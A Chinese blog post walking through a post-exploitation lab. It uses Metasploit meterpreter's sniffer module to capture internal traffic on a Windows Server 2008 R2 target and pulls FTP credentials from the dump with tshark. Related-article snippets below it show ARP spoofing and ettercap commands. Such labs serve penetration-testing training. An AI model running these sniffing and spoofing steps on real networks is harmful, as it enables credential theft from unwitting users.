12.4、后渗透测试--内网主机数据包流量嗅探

最新推荐文章于 2024-09-08 08:23:14 发布
原创 最新推荐文章于 2024-09-08 08:23:14 发布 · 485 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#metasploit #meterpreter #流量嗅探

本文介绍如何利用Kali Linux对内网中的Windows Server 2008 R2进行流量嗅探,通过设置嗅探器捕获FTP登录凭证等敏感信息,并详细说明了每一步骤的操作方法。
攻击主机: Kali 192.168.11.106
靶机:windows server 2008 r2  192.168.11.134
Metasploitable2-Linux: 192.168.11.105
当成功获取目标机器的会话后,可以使用嗅探手段获取更多信息。
前提: 获得 meterpreter shell
1、加载sniffer模块  use sniffer
  
2、查看帮助信息  help
3、查看可嗅探的网卡  sniffer_interfaces
  
4、指定网卡编号,开启嗅探  sniffer_start 2
5、查看嗅探的状态  sniffer_status 2
6、靶机上192.168.11.134操作,ftp方式登录Metasploitable2-Linux机器192.168.11.105
7、将流量保存到桌面  sniffer_dump 2 /root/Desktop/test.cap
8、wireshark打开文件test.cap,筛选可知ftp登录192.168.11.105的用户与密码是:msfadmin/msfadmin
快速筛选用户密码: tshark -r test.cap| grep -E 'PASS|USER'
9、停止嗅探与释放捕获的数据包
sniffer_stop 2
sniffer_release 2
参考:
流量嗅探工具
08-01
网络嗅探工具,操作简单,使用方便,便于观察,很好很强大~!
流量嗅探详解
m0_62207482的博客
02-07 1635
无论如何,当你与其他设备进行通信时就会产生流量,当这些 流量脱离了你的计算机后,其安全就不能得到有效的保障,然而这些流量中却包 含着你的敏感数据,攻击者完全可以在不入侵你计算机的情况下获得你的敏感数 据,这个过程叫流量嗅探。互联网中的流量都是以数据包的形式传送的,流量嗅探是对数据包中的流量 进行数据分析的一种手段。通过网络嗅探工具可以捕获到目标计算机网络的数据 包,数据包中的数据是根据所采用协议的要求来组织的,只要能够掌握协议的格 式,就能够分析出这些数据所表示的意义。·filter:流量的过滤规则。
局域网嗅探
weixin_54252904的博客
06-02 1763
局域网嗅探断网攻击(中间人攻击)嗅探开启中间人欺骗捕获图片cookie会话劫持 受害方:172.21.22.2 kali攻击方:172.21.230.72 断网攻击(中间人攻击) 受害者可上网 开始攻击 arpspoof -i eth0 -t 172.21.22.2 172.21.1.1 -i : 指定网卡 -t :指定攻击目标 最后是网关 查看arp缓存,已被投毒 arp -d 清除arp缓存 嗅探 开启中间人欺骗 ettercap -i eth0 -TqM arp:remote /172.21
现代网络流量嗅探器:sniffer
最新发布
gitblog_00500的博客
09-08 890
现代网络流量嗅探器:sniffer 在网络故障排查和性能监控中,实时了解网络流量情况至关重要。sniffer 是一个现代化的网络流量嗅探工具,旨在帮助用户快速分析网络流量,识别出导致流量激增的进程或连接。本文将详细介绍 sniffer 的功能、技术实现、应用场景及其独特特点。 项目介绍 sniffer 是一个基于 Go 语言开发的网络流量嗅探工具,灵感来源于 Rust 编写的 bandwhich ...
python渗透测试入门——流量嗅探
人生不怕起点低,就怕没追求
03-06 680
接收到预期的ICMP消息时,我们首先检查这个响应是不是来自我们正在扫描的子网,然后检查ICMP消息里有没有我们自定义的签名。在负责接收数据包的主循环中,我们会判断接收到的数据包是否为ICMP数据包,然后计算出ICMP数据在原始数据包中的偏移,最后将数据按照ICMP结构进行解析。注意:这里Windows和Linux的区别是,前者允许我们嗅探任何协议的所有流入数据,而后者强制我们指定一个协议来嗅探,这里指定的是ICMP。上面这只是一个非常简单的嗅探器,那我们将对它的功能进行进一步的拓展。1.代码及代码讲解。
Packet-Sniffing-and-spoofing:数据包嗅探和欺骗
05-31
任务 1 a:从教程下载 sniffex.c 程序 b:捕获两个特定主机之间的 ICMP 数据包。 捕获目标端口范围为 10 - 100 的 TCP 数据包。 c:在 telnet 上嗅探密码。 任务 2 a:ICMP 欺骗程序 b:欺骗 ICMP Echo 请求。 代表...
嗅探器设计与实现-基于c++实现对于网卡流量进行数据包分析源码+项目说明.zip
06-05
嗅探器设计与实现-基于c++实现对于网卡流量进行数据包分析源码+项目说明.zip 项目设计 获取网卡 在下拉框控件中,使用GetAllAdapter()获取本地的网卡信息 获取的网卡信息是pcap_if_t类型的链表,每个元素存储了一个...
WiFi-Sniffing-and-Distributed-Computing:WiFi的数据包嗅探和分布式计算工具
05-17
#用于WiFi的数据包嗅探和分布式计算工具 ## WiFi数据包嗅探 该工具是一种自适应的数据包嗅探器,它根据捕获的数据包的频率来更改信道,并相应地重新分配每个信道的时间。 此外,随着对无线解决方案的依赖性不断提高...
用C实现网络编程---抓取网络数据包的实现方法.pdf
09-24
嗅探器的目的是从网卡接收所有经过它的数据包,这些数据包可以是发给它的也可以是发往别处的。 要实现嗅探器,需要将网卡设置为混杂模式,通过原始套接字(raw socket)来实现。此外,还需要通过setsockopt()函数来...
Packet-Sniffer:纯Python网络数据包嗅探工具
03-11
Python 3网络数据包嗅探器 一个简单的纯Python网络数据包嗅探器。 当数据包到达给定的网络接口控制器时,数据包将被分解,并将其信息显示在屏幕上。 此应用程序不依赖第三方模块,可以由任何Python 3.x解释器运行...
局域网嗅探工具
08-21
很好用的一款局域网嗅探工具,对于查找局域网内计算机很有用处。
嗅探截获本机_内网传输密码:SniffPass v1.03
02-21
嗅探截获本机_内网传输密码:SniffPass v1.03 嗅探截获本机_内网传输密码:SniffPass v1.03
局域网入侵查看嗅探工具
11-13
一款集局域网入侵查看嗅探为一身的强大软件,破解版的。
网站精华渗透测试嗅探流量抓包剖析
网站安全专家
12-26 1042
在浩瀚的网络中安全问题是最普遍的需求,很多想要对网站进行渗透测试服务的,来想要保障网站的安全性防止被入侵被攻击等问题,在此我们Sine安全整理了下在渗透安全测试中抓包分析以及嗅探主机服务类型,以及端口扫描等识别应用服务,来综合评估网站安全。 8.2.1. TCPDump TCPDump是一款数据包的抓取分析工具,可以将网络中传送的数据包的完全截获下来提供分析。它支持针对网络层、协议、主机...
利用NetFuke进行内网嗅探
热门推荐
安全汪
03-18 3万+
利用NetFuke进行内网嗅探今天在论坛里看到一哥们利用工具嗅探隔壁女神信息并最终搞定女神所有的隐私信息的故事,哈哈,感觉挺好玩的,晚上刚好没事,就研究看一番。使用工具:NetFuke嗅探工具 测试环境:VMware平台、xp虚拟机、Kali虚拟机在使用NetFuck之前,电脑上必须安装的一个插件是Winpcap,这是一款基于windows平台下一个免费,公共的网络访问系统。开发winpcap这个
利用sslstrip和ettercap突破ssl嗅探密码
gold0523的专栏
11-16 1811
本教程不是原创,是使用黑帽大会上Moxie Marlinspike发布的一款叫sslstrip的工具,配合ettercap进行arp欺骗,可以突破经过ssl加密的协议(如https等,一种被动使用https协议的会受到攻击),进行局域网arp嗅探获得口令等信息。本教程不涉及原理,只讲应用,我尽量迅速录完节省大家时间 仍然跟大家说声抱歉,因为个人原因最近比较惆怅,因此不爱说话,所以还是不录语音教
kali 实战 记录一次图书馆的内网嗅探(没找到合适的,就嗅探的本机)
wh1te 小白的博客
06-13 1万+
第一步肯定是打开kali,这次可能用到的工具有 Ettercap driftnet因为嗅探用的是arp欺骗所以第一步应该打开路由转发echo 1 >> /proc/sys/net/ipv4/ip_forward可以用cat指令查看自己是否打开了路由转发cat /proc/sys/net/ipv4/ip_forward显示为1  则为路由转发成功查看自己ip地址 ifconfig虚拟机的...
Python渗透测试流量分析:流量嗅探工具编程
Bruce_xiaowei的博客
04-23 4167
Python渗透测试流量分析:流量嗅探工具编程 ​ 不少人存在这样的观点:只要计算机安装各种专业的安全软件,系统及时更新补丁,密码尽可能复杂,那么计算机就会避免遭到入侵。当然这样的确不容易被入侵,但那也只是对传统的病毒、木马而言,在流量攻击面前,这些防护就会显得无能为力。无论何时,当你与其他设备进行通信时就会产生流量,当这些流量脱离了你的计算机后,其安全就不能得到有效的保障,然而这些流量中却包含着你的敏感数据,攻击者完全可以在不入侵你计算机的情况下获得你的敏感数据,这个过程叫流量嗅探。 实验环境: O
记录一次ARP欺骗+内网嗅探(wirshark抓取https)
akucoco的博客
08-04 1374
使用kali对内网进行ARP欺骗,嗅探监听目标主机(wirshark抓取https数据包
TCPSniffer:一款内网渗透与数据包嗅探工具解析
在获得目标网络的访问权限后,攻击者可以利用TCPSniffer嗅探内网中的通信流量,获取其他主机的登录凭证、内部通信内容等,为进一步横向移动提供支持。 值得注意的是,虽然TCPSniffer嗅探工具在合法的网络管理和安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值